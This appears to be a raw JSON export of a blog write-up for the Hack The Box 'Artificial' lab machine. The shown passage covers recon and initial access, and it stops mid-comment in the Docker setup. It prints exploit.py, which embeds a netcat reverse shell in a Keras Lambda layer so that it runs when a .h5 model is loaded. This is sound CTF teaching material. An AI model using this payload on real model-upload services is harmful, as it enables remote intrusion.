[{"data":1,"prerenderedAt":2350},["ShallowReactive",2],{"\u002F2025\u002Fhtb-artificial-writeup":3,"surround-\u002F2025\u002Fhtb-artificial-writeup":2341},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":14,"draft":6,"readingTime":15,"body":20,"_type":2334,"_id":2335,"_source":2336,"_file":2337,"_stem":2338,"_extension":2339,"_original_dir":2340},"\u002F2025\u002Fhtb-artificial-writeup","2025",false,"","HTB - Artificial","A detailed writeup on how to solve the Hack The Box 'Artificial' machine. This post covers gaining initial access through a TensorFlow model RCE, escalating privileges to the 'gael' user by cracking a password found in a database, and finally achieving root access by exploiting a 'backrest' backup service to retrieve the root user's SSH key.","2025-10-29T11:40:48.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002Fthumbnail.jpg",[13],"CTF",true,{"text":16,"minutes":17,"time":18,"words":19},"7 min read",6.75,405000,1350,{"type":21,"children":22,"toc":2324},"root",[23,29,45,52,56,60,101,105,110,114,119,147,160,164,169,188,210,214,220,232,237,248,262,266,286,675,704,708,717,722,910,915,1105,1109,1113,1126,1151,1155,1160,1243,1247,1253,1260,1272,1276,1288,1296,1300,1305,1309,1347,1351,1362,1368,1382,1386,1390,1395,1428,1432,1437,1448,1493,1505,1509,1522,1526,1547,1552,1565,1569,1605,1609,1614,1656,1660,1664,1677,1767,1771,1775,1779,1807,2096,2110,2114,2118,2122,2135,2178,2182,2195,2199,2206,2211,2231,2235,2239,2247,2252,2256,2264,2269,2273,2286,2290,2295,2299,2304,2308,2312,2318],{"type":24,"tag":25,"props":26,"children":28},"element","pic",{"src":27},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F1.jpg",[],{"type":24,"tag":30,"props":31,"children":32},"p",{},[33,36],{"type":34,"value":35},"text","Target IP: ",{"type":24,"tag":37,"props":38,"children":42},"a",{"href":39,"rel":40},"https:\u002F\u002Fapp.hackthebox.com\u002Fmachines\u002FArtificial",[41],"nofollow",[43],{"type":34,"value":44},"10.10.11.74 - artificial.htb",{"type":24,"tag":46,"props":47,"children":49},"h2",{"id":48},"reconnaissance",[50],{"type":34,"value":51},"Reconnaissance",{"type":24,"tag":25,"props":53,"children":55},{"src":54},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F2.jpg",[],{"type":24,"tag":25,"props":57,"children":59},{"src":58},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F3.jpg",[],{"type":24,"tag":30,"props":61,"children":62},{},[63,65,72,74,80,82,91,93,99],{"type":34,"value":64},"As a result of our scans, we see that ports ",{"type":24,"tag":66,"props":67,"children":69},"code",{"className":68},[],[70],{"type":34,"value":71},"22",{"type":34,"value":73}," and ",{"type":24,"tag":66,"props":75,"children":77},{"className":76},[],[78],{"type":34,"value":79},"80",{"type":34,"value":81}," are open and we need to redirect to ",{"type":24,"tag":66,"props":83,"children":88},{"className":84,"id":86,"style":87},[85],"example-info","just-like-this","color: #4DFFBE",[89],{"type":34,"value":90},"artificial.htb",{"type":34,"value":92},". We can easily do this by adding it to the ",{"type":24,"tag":66,"props":94,"children":96},{"className":95},[],[97],{"type":34,"value":98},"\u002Fetc\u002Fhosts",{"type":34,"value":100}," file. Now let's take a look at the site.",{"type":24,"tag":25,"props":102,"children":104},{"src":103},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F4.jpg",[],{"type":24,"tag":30,"props":106,"children":107},{},[108],{"type":34,"value":109},"From the site, we understand that we are doing things with AI, creating AI models, etc.",{"type":24,"tag":25,"props":111,"children":113},{"src":112},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F5.jpg",[],{"type":24,"tag":30,"props":115,"children":116},{},[117],{"type":34,"value":118},"We can create a registration from the register section of the site. I created a registration with the following information;",{"type":24,"tag":120,"props":121,"children":122},"ul",{},[123,129,138],{"type":24,"tag":124,"props":125,"children":126},"li",{},[127],{"type":34,"value":128},"test",{"type":24,"tag":124,"props":130,"children":131},{},[132],{"type":24,"tag":37,"props":133,"children":135},{"href":134},"mailto:test@example.com",[136],{"type":34,"value":137},"test@example.com",{"type":24,"tag":124,"props":139,"children":140},{},[141,143],{"type":34,"value":142},"test12345",{"type":24,"tag":25,"props":144,"children":146},{"src":145},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F6.jpg",[],{"type":24,"tag":30,"props":148,"children":149},{},[150,152,158],{"type":34,"value":151},"An interface appears where we can upload a model. When we try to upload a file here, we see that ",{"type":24,"tag":66,"props":153,"children":155},{"className":154},[],[156],{"type":34,"value":157},".h5",{"type":34,"value":159}," files are accepted.",{"type":24,"tag":25,"props":161,"children":163},{"src":162},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F7.jpg",[],{"type":24,"tag":30,"props":165,"children":166},{},[167],{"type":34,"value":168},"In this case, we are investigating how we can run code with the h5 file and what is h5.",{"type":24,"tag":170,"props":171,"children":173},"alert",{"type":172},"info",[174,183],{"type":24,"tag":175,"props":176,"children":177},"template",{"v-slot:title":7},[178],{"type":24,"tag":30,"props":179,"children":180},{},[181],{"type":34,"value":182},"What is .h5?",{"type":24,"tag":30,"props":184,"children":185},{},[186],{"type":34,"value":187},"The .h5 file format is a data storage format that uses the HDF5 (Hierarchical Data Format 5) structure. It is used to store large and complex data (such as artificial intelligence models or scientific data) hierarchically and efficiently.",{"type":24,"tag":30,"props":189,"children":190},{},[191,193,199,201,208],{"type":34,"value":192},"Since we are dealing with artificial intelligence, when we do a search like ",{"type":24,"tag":66,"props":194,"children":196},{"className":195},[],[197],{"type":34,"value":198},"h5 model command execute",{"type":34,"value":200}," on google, we come across ",{"type":24,"tag":37,"props":202,"children":205},{"href":203,"rel":204},"https:\u002F\u002Fsplint.gitbook.io\u002Fcyberblog\u002Fsecurity-research\u002Ftensorflow-remote-code-execution-with-malicious-model",[41],[206],{"type":34,"value":207},"this",{"type":34,"value":209}," site.",{"type":24,"tag":25,"props":211,"children":213},{"src":212},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F8.jpg",[],{"type":24,"tag":46,"props":215,"children":217},{"id":216},"initial-access",[218],{"type":34,"value":219},"Initial Access",{"type":24,"tag":30,"props":221,"children":222},{},[223,225,230],{"type":34,"value":224},"And we see that we can perform RCE with these ",{"type":24,"tag":66,"props":226,"children":228},{"className":227},[],[229],{"type":34,"value":157},{"type":34,"value":231}," models.",{"type":24,"tag":30,"props":233,"children":234},{},[235],{"type":34,"value":236},"This is not a \"TensorFlow vulnerability\". It is a risk inherent in a feature of TensorFlow. TensorFlow's own documentation also warns about this: \"Think of TensorFlow models as programs and don't run models from untrusted sources.\"",{"type":24,"tag":30,"props":238,"children":239},{},[240,242],{"type":34,"value":241},"This vulnerability stems from the fact that TensorFlow's Lambda layer allows arbitrary Python code to be wrapped and saved as part of a model. An attacker can embed a malicious Lambda layer containing operating system commands (for example, a reverse shell) into the model. As soon as a victim loads this malicious model with the load_model() function, this embedded arbitrary code is automatically executed, leading to remote code execution (RCE). ",{"type":24,"tag":37,"props":243,"children":245},{"href":203,"rel":244},[41],[246],{"type":34,"value":247},"(detailed review)",{"type":24,"tag":30,"props":249,"children":250},{},[251,253,260],{"type":34,"value":252},"To exploit this vulnerability, we will use the exploit from ",{"type":24,"tag":37,"props":254,"children":257},{"href":255,"rel":256},"https:\u002F\u002Fgithub.com\u002FSplinter0\u002Ftensorflow-rce",[41],[258],{"type":34,"value":259},"this github repo",{"type":34,"value":261},". This github repo is already mentioned on the vulnerability page we reviewed above.",{"type":24,"tag":25,"props":263,"children":265},{"src":264},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F9.jpg",[],{"type":24,"tag":30,"props":267,"children":268},{},[269,271,276,278,284],{"type":34,"value":270},"The logic is simple: we will create an ",{"type":24,"tag":66,"props":272,"children":274},{"className":273},[],[275],{"type":34,"value":157},{"type":34,"value":277}," model file with our reverse shell in it using ",{"type":24,"tag":66,"props":279,"children":281},{"className":280},[],[282],{"type":34,"value":283},"exploit.py",{"type":34,"value":285},". And when we upload this model to the target, we will automatically get a reverse shell.",{"type":24,"tag":287,"props":288,"children":292},"pre",{"code":289,"filename":283,"language":290,"meta":7,"className":291,"style":7},"import tensorflow as tf\n\ndef exploit(x):\n    import os\n    os.system(\"rm -f \u002Ftmp\u002Ff;mknod \u002Ftmp\u002Ff p;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc \u003Cip> 1234 >\u002Ftmp\u002Ff\")\n    return x\n\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.Input(shape=(64,)))\nmodel.add(tf.keras.layers.Lambda(exploit))\nmodel.compile()\nmodel.save(\"exploit.h5\")\n","py","language-py shiki shiki-themes catppuccin-latte one-dark-pro",[293],{"type":24,"tag":66,"props":294,"children":295},{"__ignoreMap":7},[296,324,333,365,379,414,428,436,479,561,624,645],{"type":24,"tag":297,"props":298,"children":301},"span",{"class":299,"line":300},"line",1,[302,308,314,319],{"type":24,"tag":297,"props":303,"children":305},{"style":304},"--shiki-default:#8839EF;--shiki-dark:#C678DD",[306],{"type":34,"value":307},"import",{"type":24,"tag":297,"props":309,"children":311},{"style":310},"--shiki-default:#4C4F69;--shiki-dark:#ABB2BF",[312],{"type":34,"value":313}," tensorflow ",{"type":24,"tag":297,"props":315,"children":316},{"style":304},[317],{"type":34,"value":318},"as",{"type":24,"tag":297,"props":320,"children":321},{"style":310},[322],{"type":34,"value":323}," tf\n",{"type":24,"tag":297,"props":325,"children":327},{"class":299,"line":326},2,[328],{"type":24,"tag":297,"props":329,"children":330},{"emptyLinePlaceholder":14},[331],{"type":34,"value":332},"\n",{"type":24,"tag":297,"props":334,"children":336},{"class":299,"line":335},3,[337,342,348,354,360],{"type":24,"tag":297,"props":338,"children":339},{"style":304},[340],{"type":34,"value":341},"def",{"type":24,"tag":297,"props":343,"children":345},{"style":344},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[346],{"type":34,"value":347}," exploit",{"type":24,"tag":297,"props":349,"children":351},{"style":350},"--shiki-default:#7C7F93;--shiki-dark:#ABB2BF",[352],{"type":34,"value":353},"(",{"type":24,"tag":297,"props":355,"children":357},{"style":356},"--shiki-default:#E64553;--shiki-default-font-style:italic;--shiki-dark:#D19A66;--shiki-dark-font-style:italic",[358],{"type":34,"value":359},"x",{"type":24,"tag":297,"props":361,"children":362},{"style":350},[363],{"type":34,"value":364},"):\n",{"type":24,"tag":297,"props":366,"children":368},{"class":299,"line":367},4,[369,374],{"type":24,"tag":297,"props":370,"children":371},{"style":304},[372],{"type":34,"value":373},"    import",{"type":24,"tag":297,"props":375,"children":376},{"style":310},[377],{"type":34,"value":378}," os\n",{"type":24,"tag":297,"props":380,"children":382},{"class":299,"line":381},5,[383,388,393,399,403,409],{"type":24,"tag":297,"props":384,"children":385},{"style":310},[386],{"type":34,"value":387},"    os",{"type":24,"tag":297,"props":389,"children":390},{"style":350},[391],{"type":34,"value":392},".",{"type":24,"tag":297,"props":394,"children":396},{"style":395},"--shiki-default:#1E66F5;--shiki-dark:#61AFEF",[397],{"type":34,"value":398},"system",{"type":24,"tag":297,"props":400,"children":401},{"style":350},[402],{"type":34,"value":353},{"type":24,"tag":297,"props":404,"children":406},{"style":405},"--shiki-default:#40A02B;--shiki-dark:#98C379",[407],{"type":34,"value":408},"\"rm -f \u002Ftmp\u002Ff;mknod \u002Ftmp\u002Ff p;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc \u003Cip> 1234 >\u002Ftmp\u002Ff\"",{"type":24,"tag":297,"props":410,"children":411},{"style":350},[412],{"type":34,"value":413},")\n",{"type":24,"tag":297,"props":415,"children":417},{"class":299,"line":416},6,[418,423],{"type":24,"tag":297,"props":419,"children":420},{"style":304},[421],{"type":34,"value":422},"    return",{"type":24,"tag":297,"props":424,"children":425},{"style":310},[426],{"type":34,"value":427}," x\n",{"type":24,"tag":297,"props":429,"children":431},{"class":299,"line":430},7,[432],{"type":24,"tag":297,"props":433,"children":434},{"emptyLinePlaceholder":14},[435],{"type":34,"value":332},{"type":24,"tag":297,"props":437,"children":439},{"class":299,"line":438},8,[440,445,451,456,460,465,469,474],{"type":24,"tag":297,"props":441,"children":442},{"style":310},[443],{"type":34,"value":444},"model ",{"type":24,"tag":297,"props":446,"children":448},{"style":447},"--shiki-default:#179299;--shiki-dark:#56B6C2",[449],{"type":34,"value":450},"=",{"type":24,"tag":297,"props":452,"children":453},{"style":310},[454],{"type":34,"value":455}," tf",{"type":24,"tag":297,"props":457,"children":458},{"style":350},[459],{"type":34,"value":392},{"type":24,"tag":297,"props":461,"children":462},{"style":310},[463],{"type":34,"value":464},"keras",{"type":24,"tag":297,"props":466,"children":467},{"style":350},[468],{"type":34,"value":392},{"type":24,"tag":297,"props":470,"children":471},{"style":395},[472],{"type":34,"value":473},"Sequential",{"type":24,"tag":297,"props":475,"children":476},{"style":350},[477],{"type":34,"value":478},"()\n",{"type":24,"tag":297,"props":480,"children":482},{"class":299,"line":481},9,[483,488,492,497,501,506,510,514,518,523,527,532,536,542,546,550,556],{"type":24,"tag":297,"props":484,"children":485},{"style":310},[486],{"type":34,"value":487},"model",{"type":24,"tag":297,"props":489,"children":490},{"style":350},[491],{"type":34,"value":392},{"type":24,"tag":297,"props":493,"children":494},{"style":395},[495],{"type":34,"value":496},"add",{"type":24,"tag":297,"props":498,"children":499},{"style":350},[500],{"type":34,"value":353},{"type":24,"tag":297,"props":502,"children":503},{"style":310},[504],{"type":34,"value":505},"tf",{"type":24,"tag":297,"props":507,"children":508},{"style":350},[509],{"type":34,"value":392},{"type":24,"tag":297,"props":511,"children":512},{"style":310},[513],{"type":34,"value":464},{"type":24,"tag":297,"props":515,"children":516},{"style":350},[517],{"type":34,"value":392},{"type":24,"tag":297,"props":519,"children":520},{"style":310},[521],{"type":34,"value":522},"layers",{"type":24,"tag":297,"props":524,"children":525},{"style":350},[526],{"type":34,"value":392},{"type":24,"tag":297,"props":528,"children":529},{"style":395},[530],{"type":34,"value":531},"Input",{"type":24,"tag":297,"props":533,"children":534},{"style":350},[535],{"type":34,"value":353},{"type":24,"tag":297,"props":537,"children":539},{"style":538},"--shiki-default:#E64553;--shiki-default-font-style:italic;--shiki-dark:#E06C75;--shiki-dark-font-style:italic",[540],{"type":34,"value":541},"shape",{"type":24,"tag":297,"props":543,"children":544},{"style":447},[545],{"type":34,"value":450},{"type":24,"tag":297,"props":547,"children":548},{"style":350},[549],{"type":34,"value":353},{"type":24,"tag":297,"props":551,"children":553},{"style":552},"--shiki-default:#FE640B;--shiki-dark:#D19A66",[554],{"type":34,"value":555},"64",{"type":24,"tag":297,"props":557,"children":558},{"style":350},[559],{"type":34,"value":560},",)))\n",{"type":24,"tag":297,"props":562,"children":564},{"class":299,"line":563},10,[565,569,573,577,581,585,589,593,597,601,605,610,614,619],{"type":24,"tag":297,"props":566,"children":567},{"style":310},[568],{"type":34,"value":487},{"type":24,"tag":297,"props":570,"children":571},{"style":350},[572],{"type":34,"value":392},{"type":24,"tag":297,"props":574,"children":575},{"style":395},[576],{"type":34,"value":496},{"type":24,"tag":297,"props":578,"children":579},{"style":350},[580],{"type":34,"value":353},{"type":24,"tag":297,"props":582,"children":583},{"style":310},[584],{"type":34,"value":505},{"type":24,"tag":297,"props":586,"children":587},{"style":350},[588],{"type":34,"value":392},{"type":24,"tag":297,"props":590,"children":591},{"style":310},[592],{"type":34,"value":464},{"type":24,"tag":297,"props":594,"children":595},{"style":350},[596],{"type":34,"value":392},{"type":24,"tag":297,"props":598,"children":599},{"style":310},[600],{"type":34,"value":522},{"type":24,"tag":297,"props":602,"children":603},{"style":350},[604],{"type":34,"value":392},{"type":24,"tag":297,"props":606,"children":607},{"style":395},[608],{"type":34,"value":609},"Lambda",{"type":24,"tag":297,"props":611,"children":612},{"style":350},[613],{"type":34,"value":353},{"type":24,"tag":297,"props":615,"children":616},{"style":310},[617],{"type":34,"value":618},"exploit",{"type":24,"tag":297,"props":620,"children":621},{"style":350},[622],{"type":34,"value":623},"))\n",{"type":24,"tag":297,"props":625,"children":627},{"class":299,"line":626},11,[628,632,636,641],{"type":24,"tag":297,"props":629,"children":630},{"style":310},[631],{"type":34,"value":487},{"type":24,"tag":297,"props":633,"children":634},{"style":350},[635],{"type":34,"value":392},{"type":24,"tag":297,"props":637,"children":638},{"style":395},[639],{"type":34,"value":640},"compile",{"type":24,"tag":297,"props":642,"children":643},{"style":350},[644],{"type":34,"value":478},{"type":24,"tag":297,"props":646,"children":648},{"class":299,"line":647},12,[649,653,657,662,666,671],{"type":24,"tag":297,"props":650,"children":651},{"style":310},[652],{"type":34,"value":487},{"type":24,"tag":297,"props":654,"children":655},{"style":350},[656],{"type":34,"value":392},{"type":24,"tag":297,"props":658,"children":659},{"style":395},[660],{"type":34,"value":661},"save",{"type":24,"tag":297,"props":663,"children":664},{"style":350},[665],{"type":34,"value":353},{"type":24,"tag":297,"props":667,"children":668},{"style":405},[669],{"type":34,"value":670},"\"exploit.h5\"",{"type":24,"tag":297,"props":672,"children":673},{"style":350},[674],{"type":34,"value":413},{"type":24,"tag":30,"props":676,"children":677},{},[678,680,686,688,694,696,702],{"type":34,"value":679},"To create this model, we need ",{"type":24,"tag":66,"props":681,"children":683},{"className":682},[],[684],{"type":34,"value":685},"tensorflow",{"type":34,"value":687},". Since I am currently on a device with ",{"type":24,"tag":66,"props":689,"children":691},{"className":690},[],[692],{"type":34,"value":693},"arm",{"type":34,"value":695}," architecture, I will proceed via docker. The model upload page already gave us a ",{"type":24,"tag":66,"props":697,"children":699},{"className":698},[],[700],{"type":34,"value":701},"dockerfile",{"type":34,"value":703},". This way, we will easily create the necessary environment.",{"type":24,"tag":25,"props":705,"children":707},{"src":706},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F10.jpg",[],{"type":24,"tag":287,"props":709,"children":712},{"code":710,"filename":711,"meta":7},"FROM python:3.8-slim\n\nWORKDIR \u002Fcode\n\nRUN apt-get update && \\\n    apt-get install -y curl && \\\n    curl -k -LO https:\u002F\u002Ffiles.pythonhosted.org\u002Fpackages\u002F65\u002Fad\u002F4e090ca3b4de53404df9d1247c8a371346737862cfe539e7516fd23149a4\u002Ftensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \\\n    rm -rf \u002Fvar\u002Flib\u002Fapt\u002Flists\u002F*\n\nRUN pip install .\u002Ftensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl\n\nENTRYPOINT [\"\u002Fbin\u002Fbash\"]\n\n","Dockerfile",[713],{"type":24,"tag":66,"props":714,"children":715},{"__ignoreMap":7},[716],{"type":34,"value":710},{"type":24,"tag":30,"props":718,"children":719},{},[720],{"type":34,"value":721},"So let's go step by step and set up our docker environment and create our model.",{"type":24,"tag":287,"props":723,"children":727},{"code":724,"language":725,"meta":7,"className":726,"style":7},"sudo apt update                         # Update package lists\nsudo apt install docker.io docker-cli -y # Install Docker packages and CLI\nsudo systemctl start docker             # Start the Docker service now\nsudo systemctl enable docker            # Start Docker automatically when the system reboots\n\nsudo apt install qemu-user-static binfmt-support -y # Tools required to run Linux\u002Famd64 images on different CPU architectures (e.g. ARM)\nsudo systemctl restart docker           # We will restart Docker after the binfmt\u002Fqemu installation\n","bash","language-bash shiki shiki-themes catppuccin-latte one-dark-pro",[728],{"type":24,"tag":66,"props":729,"children":730},{"__ignoreMap":7},[731,755,792,819,844,851,885],{"type":24,"tag":297,"props":732,"children":733},{"class":299,"line":300},[734,739,744,749],{"type":24,"tag":297,"props":735,"children":736},{"style":344},[737],{"type":34,"value":738},"sudo",{"type":24,"tag":297,"props":740,"children":741},{"style":405},[742],{"type":34,"value":743}," apt",{"type":24,"tag":297,"props":745,"children":746},{"style":405},[747],{"type":34,"value":748}," update",{"type":24,"tag":297,"props":750,"children":752},{"style":751},"--shiki-default:#9CA0B0;--shiki-default-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic",[753],{"type":34,"value":754},"                         # Update package lists\n",{"type":24,"tag":297,"props":756,"children":757},{"class":299,"line":326},[758,762,766,771,776,781,787],{"type":24,"tag":297,"props":759,"children":760},{"style":344},[761],{"type":34,"value":738},{"type":24,"tag":297,"props":763,"children":764},{"style":405},[765],{"type":34,"value":743},{"type":24,"tag":297,"props":767,"children":768},{"style":405},[769],{"type":34,"value":770}," install",{"type":24,"tag":297,"props":772,"children":773},{"style":405},[774],{"type":34,"value":775}," docker.io",{"type":24,"tag":297,"props":777,"children":778},{"style":405},[779],{"type":34,"value":780}," docker-cli",{"type":24,"tag":297,"props":782,"children":784},{"style":783},"--shiki-default:#40A02B;--shiki-dark:#D19A66",[785],{"type":34,"value":786}," -y",{"type":24,"tag":297,"props":788,"children":789},{"style":751},[790],{"type":34,"value":791}," # Install Docker packages and CLI\n",{"type":24,"tag":297,"props":793,"children":794},{"class":299,"line":335},[795,799,804,809,814],{"type":24,"tag":297,"props":796,"children":797},{"style":344},[798],{"type":34,"value":738},{"type":24,"tag":297,"props":800,"children":801},{"style":405},[802],{"type":34,"value":803}," systemctl",{"type":24,"tag":297,"props":805,"children":806},{"style":405},[807],{"type":34,"value":808}," start",{"type":24,"tag":297,"props":810,"children":811},{"style":405},[812],{"type":34,"value":813}," docker",{"type":24,"tag":297,"props":815,"children":816},{"style":751},[817],{"type":34,"value":818},"             # Start the Docker service now\n",{"type":24,"tag":297,"props":820,"children":821},{"class":299,"line":367},[822,826,830,835,839],{"type":24,"tag":297,"props":823,"children":824},{"style":344},[825],{"type":34,"value":738},{"type":24,"tag":297,"props":827,"children":828},{"style":405},[829],{"type":34,"value":803},{"type":24,"tag":297,"props":831,"children":832},{"style":405},[833],{"type":34,"value":834}," enable",{"type":24,"tag":297,"props":836,"children":837},{"style":405},[838],{"type":34,"value":813},{"type":24,"tag":297,"props":840,"children":841},{"style":751},[842],{"type":34,"value":843},"            # Start Docker automatically when the system reboots\n",{"type":24,"tag":297,"props":845,"children":846},{"class":299,"line":381},[847],{"type":24,"tag":297,"props":848,"children":849},{"emptyLinePlaceholder":14},[850],{"type":34,"value":332},{"type":24,"tag":297,"props":852,"children":853},{"class":299,"line":416},[854,858,862,866,871,876,880],{"type":24,"tag":297,"props":855,"children":856},{"style":344},[857],{"type":34,"value":738},{"type":24,"tag":297,"props":859,"children":860},{"style":405},[861],{"type":34,"value":743},{"type":24,"tag":297,"props":863,"children":864},{"style":405},[865],{"type":34,"value":770},{"type":24,"tag":297,"props":867,"children":868},{"style":405},[869],{"type":34,"value":870}," qemu-user-static",{"type":24,"tag":297,"props":872,"children":873},{"style":405},[874],{"type":34,"value":875}," binfmt-support",{"type":24,"tag":297,"props":877,"children":878},{"style":783},[879],{"type":34,"value":786},{"type":24,"tag":297,"props":881,"children":882},{"style":751},[883],{"type":34,"value":884}," # Tools required to run Linux\u002Famd64 images on different CPU architectures (e.g. ARM)\n",{"type":24,"tag":297,"props":886,"children":887},{"class":299,"line":430},[888,892,896,901,905],{"type":24,"tag":297,"props":889,"children":890},{"style":344},[891],{"type":34,"value":738},{"type":24,"tag":297,"props":893,"children":894},{"style":405},[895],{"type":34,"value":803},{"type":24,"tag":297,"props":897,"children":898},{"style":405},[899],{"type":34,"value":900}," restart",{"type":24,"tag":297,"props":902,"children":903},{"style":405},[904],{"type":34,"value":813},{"type":24,"tag":297,"props":906,"children":907},{"style":751},[908],{"type":34,"value":909},"           # We will restart Docker after the binfmt\u002Fqemu installation\n",{"type":24,"tag":30,"props":911,"children":912},{},[913],{"type":34,"value":914},"Now that we have done the necessary installations, let's create the correct image and continue from our container.",{"type":24,"tag":287,"props":916,"children":918},{"code":917,"language":725,"meta":7,"className":726,"style":7},"sudo docker build --platform linux\u002Famd64 -t artificial .\n# Create an image named \"artificial\" using the Dockerfile in the current directory\n# --platform linux\u002Famd64 : produce an image for the x86_64 target architecture (provides compatibility with qemu if you are on an ARM machine)\n# -t artificial : give the image the tag\u002Fname \"artificial\"\n# . : The directory where the Dockerfile and context are located\n\nsudo docker run -it --rm -v \"$(pwd):\u002Fcode\" artificial\n# Start an interactive container from the created \"artificial\" image\n# -it : open an interactive terminal (like bash)\n# --rm : automatically delete when the container is closed (for temporary use)\n# -v \"$(pwd):\u002Fcode\" : mount the current directory to the \u002Fcode directory inside the container (to share files)\n# artificial : the name of the image to run\n",[919],{"type":24,"tag":66,"props":920,"children":921},{"__ignoreMap":7},[922,963,971,979,987,995,1002,1065,1073,1081,1089,1097],{"type":24,"tag":297,"props":923,"children":924},{"class":299,"line":300},[925,929,933,938,943,948,953,958],{"type":24,"tag":297,"props":926,"children":927},{"style":344},[928],{"type":34,"value":738},{"type":24,"tag":297,"props":930,"children":931},{"style":405},[932],{"type":34,"value":813},{"type":24,"tag":297,"props":934,"children":935},{"style":405},[936],{"type":34,"value":937}," build",{"type":24,"tag":297,"props":939,"children":940},{"style":783},[941],{"type":34,"value":942}," --platform",{"type":24,"tag":297,"props":944,"children":945},{"style":405},[946],{"type":34,"value":947}," linux\u002Famd64",{"type":24,"tag":297,"props":949,"children":950},{"style":783},[951],{"type":34,"value":952}," -t",{"type":24,"tag":297,"props":954,"children":955},{"style":405},[956],{"type":34,"value":957}," artificial",{"type":24,"tag":297,"props":959,"children":960},{"style":405},[961],{"type":34,"value":962}," .\n",{"type":24,"tag":297,"props":964,"children":965},{"class":299,"line":326},[966],{"type":24,"tag":297,"props":967,"children":968},{"style":751},[969],{"type":34,"value":970},"# Create an image named \"artificial\" using the Dockerfile in the current directory\n",{"type":24,"tag":297,"props":972,"children":973},{"class":299,"line":335},[974],{"type":24,"tag":297,"props":975,"children":976},{"style":751},[977],{"type":34,"value":978},"# --platform linux\u002Famd64 : produce an image for the x86_64 target architecture (provides compatibility with qemu if you are on an ARM machine)\n",{"type":24,"tag":297,"props":980,"children":981},{"class":299,"line":367},[982],{"type":24,"tag":297,"props":983,"children":984},{"style":751},[985],{"type":34,"value":986},"# -t artificial : give the image the tag\u002Fname \"artificial\"\n",{"type":24,"tag":297,"props":988,"children":989},{"class":299,"line":381},[990],{"type":24,"tag":297,"props":991,"children":992},{"style":751},[993],{"type":34,"value":994},"# . : The directory where the Dockerfile and context are located\n",{"type":24,"tag":297,"props":996,"children":997},{"class":299,"line":416},[998],{"type":24,"tag":297,"props":999,"children":1000},{"emptyLinePlaceholder":14},[1001],{"type":34,"value":332},{"type":24,"tag":297,"props":1003,"children":1004},{"class":299,"line":430},[1005,1009,1013,1018,1023,1028,1033,1038,1044,1050,1055,1060],{"type":24,"tag":297,"props":1006,"children":1007},{"style":344},[1008],{"type":34,"value":738},{"type":24,"tag":297,"props":1010,"children":1011},{"style":405},[1012],{"type":34,"value":813},{"type":24,"tag":297,"props":1014,"children":1015},{"style":405},[1016],{"type":34,"value":1017}," run",{"type":24,"tag":297,"props":1019,"children":1020},{"style":783},[1021],{"type":34,"value":1022}," -it",{"type":24,"tag":297,"props":1024,"children":1025},{"style":783},[1026],{"type":34,"value":1027}," --rm",{"type":24,"tag":297,"props":1029,"children":1030},{"style":783},[1031],{"type":34,"value":1032}," -v",{"type":24,"tag":297,"props":1034,"children":1035},{"style":405},[1036],{"type":34,"value":1037}," \"",{"type":24,"tag":297,"props":1039,"children":1041},{"style":1040},"--shiki-default:#7C7F93;--shiki-dark:#98C379",[1042],{"type":34,"value":1043},"$(",{"type":24,"tag":297,"props":1045,"children":1047},{"style":1046},"--shiki-default:#D20F39;--shiki-default-font-style:italic;--shiki-dark:#56B6C2;--shiki-dark-font-style:inherit",[1048],{"type":34,"value":1049},"pwd",{"type":24,"tag":297,"props":1051,"children":1052},{"style":1040},[1053],{"type":34,"value":1054},")",{"type":24,"tag":297,"props":1056,"children":1057},{"style":405},[1058],{"type":34,"value":1059},":\u002Fcode\"",{"type":24,"tag":297,"props":1061,"children":1062},{"style":405},[1063],{"type":34,"value":1064}," artificial\n",{"type":24,"tag":297,"props":1066,"children":1067},{"class":299,"line":438},[1068],{"type":24,"tag":297,"props":1069,"children":1070},{"style":751},[1071],{"type":34,"value":1072},"# Start an interactive container from the created \"artificial\" image\n",{"type":24,"tag":297,"props":1074,"children":1075},{"class":299,"line":481},[1076],{"type":24,"tag":297,"props":1077,"children":1078},{"style":751},[1079],{"type":34,"value":1080},"# -it : open an interactive terminal (like bash)\n",{"type":24,"tag":297,"props":1082,"children":1083},{"class":299,"line":563},[1084],{"type":24,"tag":297,"props":1085,"children":1086},{"style":751},[1087],{"type":34,"value":1088},"# --rm : automatically delete when the container is closed (for temporary use)\n",{"type":24,"tag":297,"props":1090,"children":1091},{"class":299,"line":626},[1092],{"type":24,"tag":297,"props":1093,"children":1094},{"style":751},[1095],{"type":34,"value":1096},"# -v \"$(pwd):\u002Fcode\" : mount the current directory to the \u002Fcode directory inside the container (to share 